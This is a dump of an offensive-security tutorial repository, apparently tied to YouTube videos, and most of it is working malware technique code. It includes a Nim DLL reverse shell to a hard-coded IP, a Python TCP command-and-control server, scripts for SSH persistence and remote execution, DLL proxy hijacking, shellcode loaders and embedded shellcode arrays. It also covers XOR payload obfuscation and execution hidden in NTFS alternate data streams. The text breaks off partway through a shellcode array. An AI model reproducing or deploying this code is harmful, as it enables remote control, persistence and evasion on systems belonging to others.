https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/rubberducky/webattack/inject.bin -------------------------------------------------------------------------------- /rubberducky/webattack/payload.txt: -------------------------------------------------------------------------------- 1 | 
REM opens website 2 | REM Created by : C0SM0 3 | 4 | REM allocate time for recognition 5 | DELAY 1000 6 | 7 | REM open runbox 8 | GUI r 9 | DELAY 100 10 | 11 | REM open website 12 | STRING www.cosmodiumcs.com 13 | ENTER 14 | -------------------------------------------------------------------------------- /ssh/disable-ssh-persistence.ps1: -------------------------------------------------------------------------------- 1 | Remove-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0 2 | Stop-Service sshd 3 | -------------------------------------------------------------------------------- /ssh/enable-ssh-persistence.ps1: -------------------------------------------------------------------------------- 1 | Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0 2 | Start-Service sshd 3 | Set-Service -Name sshd -StartupType 'Automatic' 4 | -------------------------------------------------------------------------------- /ssh/remote-code-exec.sh: -------------------------------------------------------------------------------- 1 | # replace `ls` with intended command 2 | ssh user@host 'ls' 3 | 4 | # combine with `sshpass` to bypass password prompt 5 | sshpass -p "password" ssh user@host 'ls' 6 | -------------------------------------------------------------------------------- /tcp/Makefile: -------------------------------------------------------------------------------- 1 | CC = gcc 2 | CFLAGS = -Wall -Wextra 3 | 4 | TARGET = agent 5 | 6 | all: $(TARGET) 7 | 8 | $(TARGET): agent.c 9 | $(CC) $(CFLAGS) -o $@ $^ 10 | 11 | clean: 12 | rm -f $(TARGET) 13 | 14 | -------------------------------------------------------------------------------- /tcp/agent: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/tcp/agent -------------------------------------------------------------------------------- /tcp/c2.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # basic tcp c2 3 | 4 | # created by : bluecosmo 5 | 6 | # imports 7 | import socket 8 | 9 | # constants 10 | HOST = "127.0.0.1" 11 | PORT = 2583 12 | 13 | # main code 14 | def main(): 15 | 16 | # setup socket 17 | print("[*] Building socket...") 18 | with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: 19 | s.bind((HOST, PORT)) 20 | 21 | # listent for connections 22 | print("[*] Listining for connections...") 23 | s.listen() 24 | connection, address = s.accept() 25 | 26 | # connection established 27 | with connection: 28 | print(f"[+] Connected to : {address}") 29 | 30 | # command and control 31 | while True: 32 | msg = input("[~] Command : ").encode() 33 | connection.sendall(msg) 34 | 35 | # parse and display response data 36 | data = b"" 37 | while True: 38 | chunk = connection.recv(1024) 39 | if not chunk: 40 | break 41 | data += chunk 42 | if b"\0" in chunk: 43 | break 44 | 45 | if (msg.startswith(b"download")): 46 | with open(msg.decode().split(" ")[1], 'wb') as f: 47 | f.write(data) 48 | print("[+] File downloaded successfully.") 49 | 50 | else: 51 | print(data.decode()) 52 | 53 | # run main code 54 | if __name__ == '__main__': 55 | main() 56 | -------------------------------------------------------------------------------- /tcp/poc.txt: -------------------------------------------------------------------------------- 1 | hi 2 | -------------------------------------------------------------------------------- /videos/alternative-data-streams/README.md: -------------------------------------------------------------------------------- 1 | # Alternative Data Stream (ADS) 2 | 3 | ## Resources 4 | - [Video](https://youtu.be/MZevjpUJ-I8) 5 | 6 | ## Hiding Data W/ ADS 7 | ```cmd 8 | REM add text to file 9 | echo poc > hideme.txt 10 | 11 | REM the following will dislpay the text 12 | type hideme.txt 13 | 14 | REM create ADS, specified with colon 15 | type 
hidem.txt > logo.png:myads.txt 16 | 17 | REM after doing a dir listing, file sizes will be the same 18 | REM delete original file 19 | del hideme.txt 20 | 21 | REM view image and ads 22 | start logo.png 23 | notepad logo.png:myads.txt 24 | 25 | REM discover ADS in directory 26 | dir /r 27 | ``` 28 | 29 | ## Execution Payload 30 | ```powershell 31 | $c = get-content image.png -stream ads.txt; iex $c 32 | ``` 33 | 34 | ## Executing Video 35 | ```powershell 36 | "C:\Program Files\Windows Media Player\wmplayer.exe" "C:\Path\To\ads.png:grad.mp4" 37 | ``` 38 | 39 | ## Executing Binary 40 | ```powershell 41 | 42 | ./ads.png:main.exe 43 | ``` 44 | -------------------------------------------------------------------------------- /videos/alternative-data-streams/ads.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/alternative-data-streams/ads.png -------------------------------------------------------------------------------- /videos/alternative-data-streams/grad.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/alternative-data-streams/grad.mp4 -------------------------------------------------------------------------------- /videos/alternative-data-streams/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #pragma comment(lib, "user32.lib") 3 | 4 | int main(VOID) { 5 | MessageBox(NULL, "subscribe :D", "CosmodiumCS", MB_ICONEXCLAMATION | MB_OK); 6 | 7 | return 0; 8 | } 9 | -------------------------------------------------------------------------------- /videos/alternative-data-streams/main.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/alternative-data-streams/main.exe -------------------------------------------------------------------------------- /videos/alternative-data-streams/payload.txt: -------------------------------------------------------------------------------- 1 | calc.exe 2 | -------------------------------------------------------------------------------- /videos/developing-trojans-with-shellcode/README.md: -------------------------------------------------------------------------------- 1 | # Resources 2 | - [Video](https://youtu.be/tS0pRL7979E) 3 | - [SysInternals](https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) 4 | - [PUSHAD](https://pdos.csail.mit.edu/6.828/2008/readings/i386/PUSHA.htm) 5 | - [PUSHFD](https://pdos.csail.mit.edu/6.828/2008/readings/i386/PUSHF.htm) 6 | - [POPAD](https://pdos.csail.mit.edu/6.828/2008/readings/i386/POPA.htm) 7 | - [POPFD](https://pdos.csail.mit.edu/6.828/2008/readings/i386/POPF.htm) 8 | -------------------------------------------------------------------------------- /videos/developing-trojans-with-shellcode/ZoomIt.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/developing-trojans-with-shellcode/ZoomIt.exe -------------------------------------------------------------------------------- /videos/developing-trojans-with-shellcode/calc.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/developing-trojans-with-shellcode/calc.bin -------------------------------------------------------------------------------- /videos/developing-trojans-with-shellcode/main.c: -------------------------------------------------------------------------------- 1 | 
#include 2 | #pragma comment(lib, "user32.lib") 3 | 4 | int main(VOID) { 5 | MessageBox(NULL, "subscribe :D", "CosmodiumCS", MB_ICONEXCLAMATION | MB_OK); 6 | 7 | return 0; 8 | } 9 | -------------------------------------------------------------------------------- /videos/developing-trojans-with-shellcode/main.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/developing-trojans-with-shellcode/main.exe -------------------------------------------------------------------------------- /videos/developing-trojans-with-shellcode/zoomit.log: -------------------------------------------------------------------------------- 1 | zoomit.exe 2 | 3 | entry point: 4 | 0039B025 | E8 A5060000 | call | 5 | 0039B02A | E9 7AFEFFFF | jmp zoomit.39AEA9 | 6 | 0039B02F | 55 | push ebp | 7 | 0039B030 | 8BEC | mov ebp,esp | 8 | 0039B032 | 6A 00 | push 0 | 9 | 0039B034 | FF15 98613C00 | call dword ptr ds:[<&SetUnhandledExcept | 10 | 0039B03A | FF75 08 | push dword ptr ss:[ebp+8] | 11 | 0039B03D | FF15 DC623C00 | call dword ptr ds:[<&UnhandledException | 12 | 13 | code cave: 14 | 003C5827 | 0000 | add byte ptr ds:[eax],al | 15 | 16 | popfd: 17 | 00CF58EB | 9D | popfd | -------------------------------------------------------------------------------- /videos/embedding-shellcode/README.md: -------------------------------------------------------------------------------- 1 | - [malapi](https://malapi.io) 2 | - [VirtualAlloc](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc) 3 | - [RtlMoveMemory](https://learn.microsoft.com/en-us/windows/win32/devnotes/rtlmovememory) 4 | - [VirtualProtect](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect) 5 | - [CreateThread](https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread) 6 | - 
[WaitForSingleObject](https://learn.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject) 7 | - [FindResourceA](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-findresourcea) 8 | - [LoadResource](https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadresource) 9 | - [LockResource](https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-lockresource) 10 | - [SizeofResource](https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-sizeofresource) -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-data/a.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-data/a.exe -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-data/embed-data.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-data/embed-data.exe -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-data/embed-data.ilk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-data/embed-data.ilk -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-data/embed-data.obj: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-data/embed-data.obj -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-data/embed-data.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-data/embed-data.pdb -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-data/vc140.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-data/vc140.pdb -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-rsrc/embed-rsrc.cpp: -------------------------------------------------------------------------------- 1 | // embed shellcode in .text section 2 | // created by : bluecosmo 3 | 4 | // imports 5 | #include 6 | #include 7 | #include 8 | 9 | #define SC_ICON 2583 10 | 11 | // main code 12 | int main(VOID) { 13 | 14 | // find shellcode payload 15 | HRSRC shellcode = FindResourceW(NULL, MAKEINTRESOURCEW(SC_ICON), RT_RCDATA 16 | // [in, optional] HMODULE hModule, 17 | // [in] LPCSTR lpName, 18 | // [in] LPCSTR lpType 19 | ); 20 | 21 | // load shellcode payload 22 | HGLOBAL shellcode_handle = LoadResource(NULL, shellcode 23 | // [in, optional] HMODULE hModule, 24 | // [in] HRSRC hResInfo 25 | ); 26 | 27 | // get pointer to shellcode payload 28 | LPVOID shellcode_payload = LockResource(shellcode_handle 29 | // [in] HGLOBAL hResData 30 | ); 31 | 32 | // get lenght of shellcode payload 33 | DWORD shellcode_length = SizeofResource(NULL, shellcode 34 | // [in, optional] HMODULE hModule, 35 | // [in] HRSRC 
hResInfo 36 | ); 37 | 38 | // allocate the memory 39 | LPVOID memory_address = VirtualAlloc(NULL, shellcode_length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE 40 | // [in, optional] LPVOID lpAddress, 41 | // [in] SIZE_T dwSize, 42 | // [in] DWORD flAllocationType, 43 | // [in] DWORD flProtect 44 | ); 45 | 46 | // load shellcode into memory 47 | RtlMoveMemory(memory_address, shellcode_payload, shellcode_length 48 | // _Out_       VOID UNALIGNED *Destination, 49 | // _In_  const VOID UNALIGNED *Source, 50 | // _In_        SIZE_T         Length 51 | ); 52 | 53 | // make shellcode executable 54 | DWORD old_protection = 0; 55 | BOOL returned_vp = VirtualProtect(memory_address, shellcode_length, PAGE_EXECUTE_READ, & old_protection 56 | // [in] LPVOID lpAddress, 57 | // [in] SIZE_T dwSize, 58 | // [in] DWORD flNewProtect, 59 | // [out] PDWORD lpflOldProtect 60 | ); 61 | 62 | // execute thread 63 | if (returned_vp != NULL) { 64 | HANDLE thread_handle = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE) memory_address, NULL, NULL, NULL 65 | // [in, optional] LPSECURITY_ATTRIBUTES lpThreadAttributes, 66 | // [in] SIZE_T dwStackSize, 67 | // [in] LPTHREAD_START_ROUTINE lpStartAddress, 68 | // [in, optional] __drv_aliasesMem LPVOID lpParameter, 69 | // [in] DWORD dwCreationFlags, 70 | // [out, optional] LPDWORD lpThreadId 71 | ); 72 | 73 | // waite for thread to complete 74 | WaitForSingleObject(thread_handle, INFINITE 75 | // [in] HANDLE hHandle, 76 | // [in] DWORD dwMilliseconds 77 | ); 78 | } 79 | } 80 | 81 | -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-rsrc/embed-rsrc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-rsrc/embed-rsrc.exe -------------------------------------------------------------------------------- 
/videos/embedding-shellcode/embed-rsrc/embed-rsrc.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-rsrc/embed-rsrc.obj -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-rsrc/notepad32.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-rsrc/notepad32.ico -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-rsrc/rsrc.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-rsrc/rsrc.o -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-rsrc/rsrc.rc: -------------------------------------------------------------------------------- 1 | #define SC_ICON 2583 2 | SC_ICON RCDATA "notepad32.ico" 3 | -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-rsrc/rsrc.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-rsrc/rsrc.res -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-text/embed-text.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-text/embed-text.exe -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-text/embed-text.ilk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-text/embed-text.ilk -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-text/embed-text.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-text/embed-text.obj -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-text/embed-text.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-text/embed-text.pdb -------------------------------------------------------------------------------- /videos/embedding-shellcode/embed-text/vc140.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/embedding-shellcode/embed-text/vc140.pdb -------------------------------------------------------------------------------- /videos/embedding-shellcode/notepad32.c: -------------------------------------------------------------------------------- 1 | /* C:\Users\cosmo\development\shellcode\notepad32.bin (5/25/2023 9:24:57 PM) 2 | StartOffset(h): 00000000, EndOffset(h): 000000C3, Length(h): 000000C4 */ 3 | 4 | unsigned char 
rawData[196] = { 5 | 0xFC, 0xE8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xE5, 0x31, 0xC0, 0x64, 6 | 0x8B, 0x50, 0x30, 0x8B, 0x52, 0x0C, 0x8B, 0x52, 0x14, 0x8B, 0x72, 0x28, 7 | 0x0F, 0xB7, 0x4A, 0x26, 0x31, 0xFF, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 8 | 0x20, 0xC1, 0xCF, 0x0D, 0x01, 0xC7, 0xE2, 0xF2, 0x52, 0x57, 0x8B, 0x52, 9 | 0x10, 0x8B, 0x4A, 0x3C, 0x8B, 0x4C, 0x11, 0x78, 0xE3, 0x48, 0x01, 0xD1, 10 | 0x51, 0x8B, 0x59, 0x20, 0x01, 0xD3, 0x8B, 0x49, 0x18, 0xE3, 0x3A, 0x49, 11 | 0x8B, 0x34, 0x8B, 0x01, 0xD6, 0x31, 0xFF, 0xAC, 0xC1, 0xCF, 0x0D, 0x01, 12 | 0xC7, 0x38, 0xE0, 0x75, 0xF6, 0x03, 0x7D, 0xF8, 0x3B, 0x7D, 0x24, 0x75, 13 | 0xE4, 0x58, 0x8B, 0x58, 0x24, 0x01, 0xD3, 0x66, 0x8B, 0x0C, 0x4B, 0x8B, 14 | 0x58, 0x1C, 0x01, 0xD3, 0x8B, 0x04, 0x8B, 0x01, 0xD0, 0x89, 0x44, 0x24, 15 | 0x24, 0x5B, 0x5B, 0x61, 0x59, 0x5A, 0x51, 0xFF, 0xE0, 0x5F, 0x5F, 0x5A, 16 | 0x8B, 0x12, 0xEB, 0x8D, 0x5D, 0x6A, 0x01, 0x8D, 0x85, 0xB2, 0x00, 0x00, 17 | 0x00, 0x50, 0x68, 0x31, 0x8B, 0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xE0, 0x1D, 18 | 0x2A, 0x0A, 0x68, 0xA6, 0x95, 0xBD, 0x9D, 0xFF, 0xD5, 0x3C, 0x06, 0x7C, 19 | 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47, 0x13, 0x72, 0x6F, 0x6A, 20 | 0x00, 0x53, 0xFF, 0xD5, 0x6E, 0x6F, 0x74, 0x65, 0x70, 0x61, 0x64, 0x2E, 21 | 0x65, 0x78, 0x65, 0x00 22 | }; 23 | -------------------------------------------------------------------------------- /videos/fun-with-dlls/README.md: -------------------------------------------------------------------------------- 1 | - [video]() 2 | - [nim dll](https://github.com/byt3bl33d3r/OffensiveNim#creating-windows-dlls-with-an-exported-dllmain) 3 | - [create process win32](https://learn.microsoft.com/en-us/windows/win32/procthread/creating-processes) 4 | - [ippsec](https://youtu.be/3eROsG_WNpE) 5 | -------------------------------------------------------------------------------- /videos/fun-with-dlls/cosmo.dll: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/fun-with-dlls/cosmo.dll -------------------------------------------------------------------------------- /videos/fun-with-dlls/dll-loader.cpp: -------------------------------------------------------------------------------- 1 | // dll loader 2 | // created by : cosmo 3 | 4 | // imports 5 | #include 6 | #include 7 | #include 8 | 9 | using namespace std; 10 | 11 | // main code 12 | int main(int argc, char* argv[]) { 13 | 14 | // exception 15 | if (argc < 2) { 16 | printf("[!] Run : dll-loader.exe \n"); 17 | return EXIT_FAILURE; 18 | } 19 | 20 | // get parsed file 21 | LPCSTR dll_file = argv[1]; 22 | std::string file_name = argv[1]; 23 | printf("[*] Loading : %s...\n", file_name); 24 | 25 | // load dll 26 | HINSTANCE hDll; 27 | hDll = LoadLibrary(TEXT(dll_file)); 28 | 29 | return EXIT_SUCCESS; 30 | 31 | } -------------------------------------------------------------------------------- /videos/fun-with-dlls/dll-loader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/fun-with-dlls/dll-loader.exe -------------------------------------------------------------------------------- /videos/fun-with-dlls/dll-proxy.c: -------------------------------------------------------------------------------- 1 | // "malicious" dll 2 | // created by : cosmo 3 | 4 | // imports 5 | #include 6 | #pragma comment(lib, "user32.lib"); 7 | 8 | // dll proxy 9 | #pragma comment(linker, "/export:CscNetApiGetInterface=cscapi.CscNetApiGetInterface"); 10 | #pragma comment(linker, "/export:CscSearchApiGetInterface=cscapi.CscSearchApiGetInterface"); 11 | #pragma comment(linker, "/export:OfflineFilesEnable=cscapi.OfflineFilesEnable"); 12 | #pragma comment(linker, "/export:OfflineFilesGetShareCachingMode=cscapi.OfflineFilesGetShareCachingMode"); 13 | #pragma 
comment(linker, "/export:OfflineFilesQueryStatus=cscapi.OfflineFilesQueryStatus"); 14 | #pragma comment(linker, "/export:OfflineFilesQueryStatusEx=cscapi.OfflineFilesQueryStatusEx"); 15 | #pragma comment(linker, "/export:OfflineFilesStart=cscapi.OfflineFilesStart"); 16 | 17 | BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID LpReserved) { 18 | switch(dwReason) { 19 | case DLL_PROCESS_ATTACH: 20 | STARTUPINFO si; 21 | PROCESS_INFORMATION pi; 22 | 23 | ZeroMemory( &si, sizeof(si) ); 24 | si.cb = sizeof(si); 25 | ZeroMemory( &pi, sizeof(pi) ); 26 | 27 | // Start the child process. 28 | if( !CreateProcess( 29 | "C:\\Windows\\System32\\calc.exe", // No module name (use command line) 30 | NULL, // Command line 31 | NULL, // Process handle not inheritable 32 | NULL, // Thread handle not inheritable 33 | FALSE, // Set handle inheritance to FALSE 34 | CREATE_NO_WINDOW, // No creation flags 35 | NULL, // Use parent's environment block 36 | NULL, // Use parent's starting directory 37 | &si, // Pointer to STARTUPINFO structure 38 | &pi ) // Pointer to PROCESS_INFORMATION structure 39 | ) 40 | { 41 | return EXIT_FAILURE; 42 | } 43 | 44 | // Close process and thread handles. 
45 | CloseHandle( pi.hProcess ); 46 | CloseHandle( pi.hThread ); 47 | 48 | break; 49 | } 50 | 51 | return EXIT_SUCCESS; 52 | } -------------------------------------------------------------------------------- /videos/fun-with-dlls/dll.c: -------------------------------------------------------------------------------- 1 | // "malicious" dll 2 | // created by : cosmo 3 | 4 | // imports 5 | #include 6 | #pragma comment(lib, "user32.lib"); 7 | 8 | BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID LpReserved) { 9 | switch(dwReason) { 10 | case DLL_PROCESS_ATTACH: 11 | MessageBoxW(NULL, L"Subscribe :D", L"CosmodiumCS", MB_ICONEXCLAMATION | MB_OK); 12 | break; 13 | } 14 | 15 | return TRUE; 16 | } -------------------------------------------------------------------------------- /videos/fun-with-dlls/proxy.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/fun-with-dlls/proxy.dll -------------------------------------------------------------------------------- /videos/fun-with-dlls/shell.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/fun-with-dlls/shell.dll -------------------------------------------------------------------------------- /videos/fun-with-dlls/shell.nim: -------------------------------------------------------------------------------- 1 | # shell dll 2 | # created by : cosmo 3 | 4 | # imports 5 | import winim/lean 6 | import net, osproc, strformat 7 | 8 | proc NimMain() {.cdecl, importc.} 9 | 10 | proc DllMain(hinstDLL: HINSTANCE, fdwReason: DWORD, lpvReserved: LPVOID) : BOOL {.stdcall, exportc, dynlib.} = 11 | NimMain() 12 | 13 | if fdwReason == DLL_PROCESS_ATTACH: 14 | 15 | # variables 16 | let 17 | ip = "192.168.1.180" 18 | port = 2583 19 | sock = newSocket() 20 | prompt = 
"Cosmo's Shell $ " 21 | 22 | # connection 23 | while true: 24 | try: 25 | sock.connect(ip, Port(port)) 26 | except: 27 | continue 28 | 29 | break 30 | 31 | # loop remote shell 32 | while true: 33 | send(sock, prompt) 34 | let args = recvLine(sock) 35 | 36 | # execute 37 | try: 38 | let cmd = execProcess(fmt"cmd.exe /c" & args) 39 | send(sock, cmd) 40 | 41 | # disconnect 42 | except: 43 | break 44 | 45 | return true -------------------------------------------------------------------------------- /videos/function-obfuscation/fob/function-obfuscation-cgpa.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/function-obfuscation/fob/function-obfuscation-cgpa.obj -------------------------------------------------------------------------------- /videos/function-obfuscation/fob/function-obfuscation-full.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/function-obfuscation/fob/function-obfuscation-full.obj -------------------------------------------------------------------------------- /videos/function-obfuscation/fob/function-obfuscation.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/function-obfuscation/fob/function-obfuscation.exe -------------------------------------------------------------------------------- /videos/function-obfuscation/fob/function-obfuscation.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/function-obfuscation/fob/function-obfuscation.obj 
-------------------------------------------------------------------------------- /videos/function-obfuscation/fob/notepad.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/function-obfuscation/fob/notepad.bin -------------------------------------------------------------------------------- /videos/function-obfuscation/fob/vc140.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/function-obfuscation/fob/vc140.pdb -------------------------------------------------------------------------------- /videos/function-obfuscation/fob/xor-encrypt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # xor shellcode encryptor 3 | # created by : bluecosmo 4 | 5 | # imports 6 | import sys 7 | 8 | # constants 9 | ENCRYPTION_KEY = "cosmodiumcs" 10 | 11 | # encrypt shellcode using xor 12 | def encrypt_xor(input_data, encryption_key): 13 | encryption_key = str(encryption_key) 14 | output_string = "" 15 | 16 | # encryption process 17 | for i in range(len(input_data)): 18 | current_data_element = input_data[i] 19 | current_key = encryption_key[i % len(encryption_key)] 20 | output_string += chr(current_data_element ^ ord(current_key)) 21 | 22 | return output_string 23 | 24 | def print_ciphertext(ciphertext): 25 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 26 | 27 | try: 28 | plaintext = open(sys.argv[1], "rb").read() 29 | except Exception as e: 30 | print("Error: ", e) 31 | print("Usage: python file.py PAYLOAD") 32 | sys.exit(1) 33 | 34 | ciphertext = encrypt_xor(plaintext, ENCRYPTION_KEY) 35 | print_ciphertext(ciphertext) 36 | -------------------------------------------------------------------------------- 
/videos/function-obfuscation/function-obfuscation.cpp: -------------------------------------------------------------------------------- 1 | // function obfuscation in .data section 2 | // created by : bluecosmo 3 | 4 | // imports 5 | #include 6 | #include 7 | #include 8 | 9 | // shellcode payload 10 | unsigned char shellcode_payload[196] = { 11 | 0xFC, 0xE8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xE5, 0x31, 0xC0, 0x64, 12 | 0x8B, 0x50, 0x30, 0x8B, 0x52, 0x0C, 0x8B, 0x52, 0x14, 0x8B, 0x72, 0x28, 13 | 0x0F, 0xB7, 0x4A, 0x26, 0x31, 0xFF, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 14 | 0x20, 0xC1, 0xCF, 0x0D, 0x01, 0xC7, 0xE2, 0xF2, 0x52, 0x57, 0x8B, 0x52, 15 | 0x10, 0x8B, 0x4A, 0x3C, 0x8B, 0x4C, 0x11, 0x78, 0xE3, 0x48, 0x01, 0xD1, 16 | 0x51, 0x8B, 0x59, 0x20, 0x01, 0xD3, 0x8B, 0x49, 0x18, 0xE3, 0x3A, 0x49, 17 | 0x8B, 0x34, 0x8B, 0x01, 0xD6, 0x31, 0xFF, 0xAC, 0xC1, 0xCF, 0x0D, 0x01, 18 | 0xC7, 0x38, 0xE0, 0x75, 0xF6, 0x03, 0x7D, 0xF8, 0x3B, 0x7D, 0x24, 0x75, 19 | 0xE4, 0x58, 0x8B, 0x58, 0x24, 0x01, 0xD3, 0x66, 0x8B, 0x0C, 0x4B, 0x8B, 20 | 0x58, 0x1C, 0x01, 0xD3, 0x8B, 0x04, 0x8B, 0x01, 0xD0, 0x89, 0x44, 0x24, 21 | 0x24, 0x5B, 0x5B, 0x61, 0x59, 0x5A, 0x51, 